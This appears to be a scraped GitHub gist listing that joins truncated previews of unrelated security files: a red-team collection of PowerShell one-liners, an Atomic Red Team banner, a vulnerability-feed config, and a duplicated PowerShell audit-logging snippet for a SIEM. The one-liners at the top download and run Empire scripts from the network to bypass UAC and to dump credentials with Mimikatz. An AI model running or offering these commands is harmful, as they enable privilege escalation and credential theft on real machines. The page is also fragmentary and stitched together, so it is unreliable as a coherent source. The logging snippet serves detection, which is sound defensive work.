This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Vulnerability Data Sources] | |
# https://tools.cisco.com/security/center/Search.x | |
Cisco=true | |
# https://nvd.nist.gov/vuln/data-feeds | |
NVD=true | |
# Only support one backend for now, more coming... | |
[Asset Backends] | |
DynamoDB=true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
# For detecting dangerous PowerShell Commands/Functions | |
Log Source Type: | |
MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
Add this file to your PowerShell directory to enable verbose command line audit logging | |
profile.ps1 | |
$LogCommandHealthEvent = $true | |
$LogCommandLifeCycleEvent = $true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
# For detecting dangerous PowerShell Commands/Functions | |
Log Source Type: | |
MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
Add this file to your PowerShell directory to enable verbose command line audit logging | |
profile.ps1 | |
$LogCommandHealthEvent = $true | |
$LogCommandLifeCycleEvent = $true |